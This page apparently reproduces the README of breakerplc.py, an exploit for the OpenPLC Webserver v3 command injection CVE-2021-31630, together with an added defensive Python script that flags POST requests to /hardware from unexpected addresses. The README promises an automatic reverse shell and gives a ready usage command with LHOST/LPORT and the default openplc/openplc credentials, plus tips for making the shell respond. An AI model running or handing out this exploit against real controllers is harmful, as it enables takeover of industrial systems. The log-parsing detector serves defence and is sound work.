
CVE-2021-31630 PoC — OpenPLC Code Injection Vulnerability

Source
Associated Vulnerability
Title: OpenPLC Code Injection Vulnerability (CVE-2021-31630)
Description: Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
Description
This is an automation of CVE-2021-31630 exploitation.
Readme
This script automatically exploits the vulnerability in OpenPLC Web Server v3.

It gives you an automatic reverse shell from the server without having to use manual techniques.

CVE-2021-31630 Detail
Command Injection in Open PLC Webserver v3 allows remote attackers to execute arbitrary code via the "Hardware Layer Code Box" component on the "/hardware" page of the application.
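
Because the injection point is the /hardware page, the first thing a defender wants to know is who has been posting to it. The block below is an added example, not code from the breakerplc.py repository or from OpenPLC itself: it parses constructed Common Log Format access-log lines, returns every POST to /hardware, and marks those coming from an address outside an assumed allow list of engineering workstations. The log lines, addresses and allow list are all invented for the demo.

```python
import re
from datetime import datetime

# Constructed sample in Common Log Format (not a real capture): one change
# from an engineering workstation, then a login and a hardware-layer code
# submission from an address that is not on the allow list.
SAMPLE_LOG = """\
10.0.5.20 - - [21/Jun/2024:19:50:01 +0000] "GET /hardware HTTP/1.1" 200 5120
10.0.5.20 - - [21/Jun/2024:19:50:44 +0000] "POST /hardware HTTP/1.1" 302 0
10.0.9.77 - - [21/Jun/2024:19:53:10 +0000] "POST /login HTTP/1.1" 302 0
10.0.9.77 - - [21/Jun/2024:19:53:12 +0000] "POST /hardware?x=1 HTTP/1.1" 302 0
10.0.9.77 - - [21/Jun/2024:19:53:13 +0000] "GET / HTTP/1.1" 200 1024
this line is not a log record
"""

# Assumed allow list: the only hosts expected to change the hardware layer.
ALLOWED_SOURCES = frozenset({"10.0.5.20"})

# Common Log Format: client, identd, user, [timestamp], "request", status, size.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def _normalise_path(raw):
    """Drop the query string and a trailing slash so that /hardware?x=1 and
    /hardware/ both compare equal to /hardware."""
    path = raw.split("?", 1)[0].rstrip("/")
    return path or "/"


def hardware_code_submissions(log_text, allowed_sources=ALLOWED_SOURCES):
    """Return one finding per POST to /hardware found in log_text.

    Lines that do not parse as CLF are skipped rather than raised on, so a
    corrupt line cannot stop a sweep of a large log. Each finding records
    the client address, the parsed timestamp, the response status and
    whether the client is outside the allow list.
    """
    findings = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if m is None:
            continue
        if m.group("method") != "POST" or _normalise_path(m.group("path")) != "/hardware":
            continue
        findings.append({
            "source": m.group("ip"),
            "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
            "status": int(m.group("status")),
            "unexpected_source": m.group("ip") not in allowed_sources,
        })
    return findings


def suspicious_submissions(log_text, allowed_sources=ALLOWED_SOURCES):
    """Only the findings whose client is not an allowed engineering host."""
    return [f for f in hardware_code_submissions(log_text, allowed_sources)
            if f["unexpected_source"]]


if __name__ == "__main__":
    for f in hardware_code_submissions(SAMPLE_LOG):
        flag = "UNEXPECTED" if f["unexpected_source"] else "allowed"
        print(f"{f['time'].isoformat()} {f['source']:<12} POST /hardware -> {f['status']} ({flag})")
```

A legitimate engineer changing the hardware layer produces exactly the same POST as the exploit, so the allow list (or, in a real deployment, the authenticated OpenPLC user behind the request) is what separates the two; the path normalisation is there so that a query string or trailing slash cannot slip a submission past the check.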

*The script was customized so that, after the code has been registered in OpenPLC, it spawns the target machine's shell in the same terminal.*

Use the commands below (we recommend creating a Python virtual environment to install the dependencies). Note, however, that the breakerplc.py script must be executed outside the virtual environment.
```
sudo apt update
pip3 install requests

```
How to use? You can use the command line below.

```
python breakerplc.py -lh <your local ip> -lp 4444 http://<machine ip>:8080 -u openplc -p openplc

```
```
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url

positional arguments:
  url         Target URL with http(s)://

options:
  -h, --help  show this help message and exit
  -u U        Username
  -p P        Password
  -t T        Request Timeout, increase if server is slow
  -lh LH      LHOST
  -lp LP      LPORT

  ```
![2024-06-21 19-53-25](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/74cc2df6-17bf-4488-9e44-9c3c39ec6d80)

**IMPORTANT**
After the connection comes back, type "whoami" or "ls" once to break the hanging line and get the shell to respond.
![image](https://github.com/adibabdala123/cve-2021-31630/assets/76139191/b2176031-1b05-4fd5-b975-2fc6a18ede5e)


File Snapshot

```
[4.0K] /data/pocs/08ec8f11df017a0e372f1eabdf8b6d4e39933d30
├── [7.0K] breakerplc.py
└── [1.6K] README.md

0 directories, 2 files
```